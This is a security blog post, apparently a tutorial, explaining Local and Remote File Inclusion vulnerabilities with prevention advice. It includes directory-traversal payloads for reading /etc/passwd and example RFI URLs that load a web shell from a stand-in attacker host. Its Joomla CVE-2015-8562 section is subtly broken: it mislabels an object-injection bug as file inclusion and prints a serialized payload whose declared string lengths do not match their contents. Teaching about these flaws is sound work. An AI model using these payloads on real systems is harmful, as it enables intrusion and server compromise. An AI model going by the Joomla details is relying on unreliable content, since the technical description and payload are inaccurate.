RatSec Blog

File Inclusion

- Posted in Bug bounties by

enter image description here


  • Define LFI and RFI:
    • LFI (Local File Inclusion): A vulnerability that allows attackers to include files from the local server.
    • RFI (Remote File Inclusion): A vulnerability that allows attackers to include files from remote servers.

Importance of Understanding LFI/RFI

  • Impact: Can lead to sensitive information disclosure, code execution, and server compromise.
  • Prevalence: Common in web applications with improper input validation.

Basic Concepts

  • File Inclusion: The process of loading and executing files in web applications.
  • User Input: Often exploited through parameters in URLs or form inputs.

LFI Vulnerability

  • How LFI Works:
    • Example: http://example.com/page.php?file=../../etc/passwd
    • The application includes the specified file without proper validation.
  • Common Attack Vectors:
    • Directory traversal: ../../../../../etc/passwd
    • Null byte injection (for older PHP versions): file.php%00
  • Impact of LFI:
    • Reading sensitive files (e.g., /etc/passwd, configuration files)
    • Log file poisoning (injecting malicious code into log files and including them)
    • Access to scripts with sensitive information.

RFI Vulnerability

  • How RFI Works:
    • Example: http://example.com/page.php?file=http://malicious.com/shell.txt
    • The application includes a remote file specified by user input.
  • Common Attack Vectors:
    • Including remote malicious scripts.
    • Exploiting poorly configured file inclusion mechanisms.
  • Impact of RFI:
    • Remote code execution.
    • Full server compromise.
    • Data theft and defacement.

Real-World Examples:

LFI - Joomla Vulnerability (CVE-2015-8562)

Overview: - Joomla, a popular Content Management System (CMS), had a critical LFI vulnerability in versions 1.5 to 3.4.5.

Details: - Vulnerability: The vulnerability was in the way Joomla handled certain PHP object injection, which allowed attackers to include and execute arbitrary local files. - Exploit: Attackers could manipulate HTTP headers, such as User-Agent, to inject a payload that exploited the LFI vulnerability.

Example Attack:

  1. Crafted Request:

    • An attacker sends a specially crafted HTTP request to the Joomla site.
    • The User-Agent header is manipulated to include a PHP payload.

      GET /index.php HTTP/1.1
      Host: victim-joomla-site.com
      User-Agent: }__test|O:21:"JDatabaseDriverMysqli":3:{s:2:"fc";O:17:"JSimplepieFactory":0:{}s:21:"disconnectHandlers";a:1:{i:0;a:2:{i:0;O:9:"SimplePie":5:{s:8:"sanitize";O:20:"JDatabaseDriverMysql":0:{}s:8:"feed_url";s:42:"file:///etc/passwd";s:19:"cache_name_function";s:6:"assert";s:5:"cache";b:1;s:11:"javascript";s:11:"JDatabase";}i:1;s:4:"init";}}s:13:"connection";i:1;}
  2. Result:

    • The payload exploits the LFI vulnerability to include and execute the contents of /etc/passwd.
    • This reveals sensitive information about the system users.

Impact: - Data Disclosure: Attackers can access sensitive files like configuration files, password files, etc. - Further Exploitation: With enough information, attackers can escalate privileges and execute further attacks.

Prevention: - Update Software: Ensure Joomla and all plugins are updated to the latest versions. - Sanitize Input: Validate and sanitize all user inputs and headers. - Web Application Firewall: Use a WAF to detect and block malicious requests.

RFI - phpBB Vulnerability (CVE-2006-1529)

Overview: - phpBB, a popular forum software, had an RFI vulnerability in versions before 2.0.19.

Details: - Vulnerability: The vulnerability was in the viewtopic.php file, where user input was improperly validated, allowing remote file inclusion.

  • Exploit: Attackers could use a URL parameter to include a remote malicious file.

Example Attack:

  1. Crafted URL:

    • An attacker crafts a URL that includes a remote malicious PHP script. http http://victim-phpbb-site.com/viewtopic.php?phpbb_root_path=http://malicious-site.com/shell.txt?
  2. Result:

    • The vulnerable phpBB site includes and executes the remote shell.txt file from the attacker's server.
    • The shell.txt file contains PHP code that provides the attacker with a web shell.

Impact: - Remote Code Execution: Attackers can execute arbitrary commands on the server. - Full Server Compromise: Attackers can gain full control over the server, access data, deface the website, or use the server for further attacks.

Prevention: - Update Software: Always use the latest version of phpBB. - Disable URL Includes: In PHP configuration, set allow_url_include and allow_url_fopen to Off. - Input Validation: Validate and sanitize all inputs, especially those used in file paths.


These real-world examples demonstrate the severe impact LFI and RFI vulnerabilities can have on web applications. Regular updates, proper input validation, and secure configuration are crucial in preventing such vulnerabilities. By understanding these examples, developers and security professionals can better protect their applications from similar attacks.

hackxpert labs